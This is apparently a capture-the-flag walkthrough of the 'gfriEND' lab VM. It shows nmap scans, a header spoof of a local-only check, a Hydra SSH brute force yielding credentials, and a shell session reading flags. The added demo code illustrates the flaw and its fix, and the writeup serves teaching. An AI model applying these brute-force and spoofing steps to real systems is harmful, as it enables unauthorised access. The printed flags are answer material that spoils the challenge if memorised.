┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.118
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:27 EDT
Nmap scan report for 192.168.56.118
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,80 192.168.56.118
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:27 EDT
Nmap scan report for 192.168.56.118
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.118
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 11:29 EDT
Nmap scan report for 192.168.56.118
Host is up (0.00034s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /misc/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
MAC Address: 08:00:27:6E:E1:A4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.61 seconds
The vuln script scan turned up robots.txt, which lists a file named heyhoo.txt. Opening it gives no particular hint. (The http-slowloris-check result is a timing heuristic, reported as LIKELY VULNERABLE rather than confirmed, and a DoS is of no use for getting in; the http-enum hits are the actionable findings. The OSScan warning only means the scan was limited to the two open ports with -p22,80, so nmap had no closed port to compare against.)
The config directory has a config.php file, but it cannot be downloaded: Apache executes PHP server-side and returns only the script's output, so the directory listing shows the file while the source itself is never served.
The files in the misc directory behave the same way and cannot be downloaded either.
Web penetration
The page says it only allows local access.
So perhaps an X-Forwarded-For: 127.0.0.1 header can bypass that check. Try it with Burp Suite: send the same request with and without the header and compare the responses; if the server-side code reads the header instead of the real peer address, the spoofed request goes through.
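What the Burp test above is probing, as an added example that is not part of the original writeup or the target's code: a local reproduction with two hypothetical handlers, one that trusts the client-supplied X-Forwarded-For header (the flaw that makes the 127.0.0.1 spoof work) and one that uses only the TCP peer address (the fix). Since config.php was never downloadable, the target's real check is unknown and both handlers are assumptions. The probe connects from 127.0.0.2, which is still loopback on Linux, so it plays the remote attacker without a second machine.

```python
"""Added example: X-Forwarded-For "local access only" bypass, reproduced locally.

Not the target's code.  VulnHandler/FixedHandler stand in for the unknown
server-side check; 127.0.0.2 as the "remote" client assumes Linux loopback.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

LOCAL = "127.0.0.1"
DENY_BODY = b"only local access allowed"   # hypothetical stand-in for the target's message


def effective_client_ip(peer_ip, xff_header, trust_xff):
    """Return the address the access check will use.

    trust_xff=True is the flaw: the first X-Forwarded-For entry is taken at
    face value even though any client can send that header.
    trust_xff=False is the fix: only the TCP peer address counts.
    """
    if trust_xff and xff_header:
        return xff_header.split(",")[0].strip()
    return peer_ip


def is_local(peer_ip, xff_header, trust_xff):
    return effective_client_ip(peer_ip, xff_header, trust_xff) == LOCAL


def make_handler(trust_xff):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            allowed = is_local(self.client_address[0],
                               self.headers.get("X-Forwarded-For"), trust_xff)
            body = b"welcome, local user" if allowed else DENY_BODY
            self.send_response(200 if allowed else 403)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):   # keep the demo quiet
            pass
    return Handler


def start_server(trust_xff):
    """Bind an ephemeral port on 127.0.0.1 and serve in a background thread."""
    srv = HTTPServer((LOCAL, 0), make_handler(trust_xff))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(port, spoof, source_ip="127.0.0.2"):
    """GET / from a non-127.0.0.1 source, optionally with the spoofed header.

    This is the Burp Repeater step: same request, header present or absent.
    """
    conn = http.client.HTTPConnection(LOCAL, port, timeout=5,
                                      source_address=(source_ip, 0))
    headers = {"X-Forwarded-For": LOCAL} if spoof else {}
    conn.request("GET", "/", headers=headers)
    resp = conn.getresponse()
    status = resp.status
    resp.read()
    conn.close()
    return status


def run_demo():
    """Return {name: (status without header, status with spoofed header)}."""
    results = {}
    for name, trust in (("vulnerable", True), ("fixed", False)):
        srv = start_server(trust)
        port = srv.server_address[1]
        results[name] = (probe(port, spoof=False), probe(port, spoof=True))
        srv.shutdown()
        srv.server_close()
    return results


if __name__ == "__main__":
    for name, (plain, spoofed) in run_demo().items():
        print(f"{name:10s} no header -> {plain}, X-Forwarded-For: 127.0.0.1 -> {spoofed}")
```

The vulnerable handler returns 403 without the header and 200 with it; the fixed handler returns 403 both times. The general rule the fix encodes: X-Forwarded-For is only meaningful when a trusted reverse proxy sets it, and then the application must read the entry that proxy appended, not the first one, because the client controls everything before it.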
┌──(kali㉿kali)-[~/Downloads/meandgirlfriend]
└─$ hydra -L user -P passwd 192.168.56.118 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-22 22:28:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.118:22/
[22][ssh] host: 192.168.56.118   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-22 22:28:45
┌──(kali㉿kali)-[~/tools]
└─$ ssh alice@192.168.56.118
The authenticity of host '192.168.56.118 (192.168.56.118)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.118' (ED25519) to the list of known hosts.
alice@192.168.56.118's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ whoami
alice
alice@gfriEND:/home$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:6e:e1:a4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.118/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe6e:e1a4/64 scope link
       valid_lft forever preferred_lft forever

alice@gfriEND:/home$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:/home$ uname -a
Linux gfriEND 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
alice@gfriEND:~$ ls -liah
total 32K
 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
    12 drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
 21128 -rw------- 1 alice alice   10 Dec 13  2019 .bash_history
 21090 -rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
 21089 -rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
 21126 drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
 21091 -rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
alice@gfriEND:~$ cat .bash_history
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -liah
total 16K
142082 drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
 21088 drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
 21104 -rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
 21087 -rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:/var/www/html/config$ mysql -uroot -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 475
Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use ceban_corp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks!
Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}